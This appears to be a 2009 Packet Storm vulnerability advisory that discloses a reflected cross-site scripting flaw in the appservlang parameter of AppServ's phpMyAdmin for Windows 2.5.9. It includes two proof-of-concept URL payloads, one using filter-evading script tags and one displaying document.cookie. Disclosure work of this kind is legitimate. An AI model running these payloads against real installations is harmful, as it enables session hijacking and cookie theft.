phpMyAdmin For Windows 2.5.9 XSS

2009-09-02T00:00:00
ID PACKETSTORM:80911
Type packetstorm
Reporter ghostblup
Modified 2009-09-02T00:00:00

Description

                                        
                                            ` ^ ~~~~~~~~~~~~~ Indonesia ~~~~~~~~~~^  
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^  
^~~~~~~~~~phpmyadmin for windows 2.5.9~~~~~~~~~^  
  
Author : ghostblup  
Date : 02-09-09  
Location : Palembang, Indonesia  
Blog : http://ghostblup.blogspot.com  
Where : Cross-site scripting  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Intro  
  
  
Cross-site scripting (XSS) is a type of computer security vulnerability  
typically found in web applications which allow code injection by malicious web  
and session/cookies stolen  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application : phpMyAdmin for Windows  
version : 2.5.9  
  
Vendor : http://www.appservnetwork.com/  
Downlaod : http://prdownloads.sourceforge.net/appserv/appserv-win32-2.5.9.exe?download  
  
--------------------------------------------------------------------------  
  
Vulnerability:  
~~~~~~~~~~~~~~  
Critical Cross-site scripting (XSS).  
appservlang variable in index.php is not in the filter that allows XSS  
/ cross site scripting  
  
  
Poc/Exploit:  
~~~~~~~~~  
http://localhost/index.php?appservlang=>"><ScRiPt%20%0a%0d>alert(112233)%3B</ScRiPt>  
http://localhost/index.php?appservlang=>"><script>alert(document.cookie);</script>  
  
  
---------------------------------------------------------------------------  
  
Shoutz:  
~~~~~  
~ My Love : Ratih Permata Sari  
~ My friends : Amy,suset,revi,uwix^_^, Blackgirl ,  
jasakreativkomputer, cyberlau , Vldaz  
~ My inspiration : K-159 , y3dips,az001,Hero  
~ ngetem community, sayap community , echo.or.id , PalComTech.com  
~ #ngetem #mr_green #sayap #kegelapan @irc.allnetwork  
  
---------------------------------------------------------------------------  
Contact:  
~~~~~~  
  
ghostblup@gmail.com  
  
My Blog: http://www.ghostblup.blogspot.com  
~~~~~~~~~~~~~~~~~~~~~end~~~~~~~~~~~~~~  
`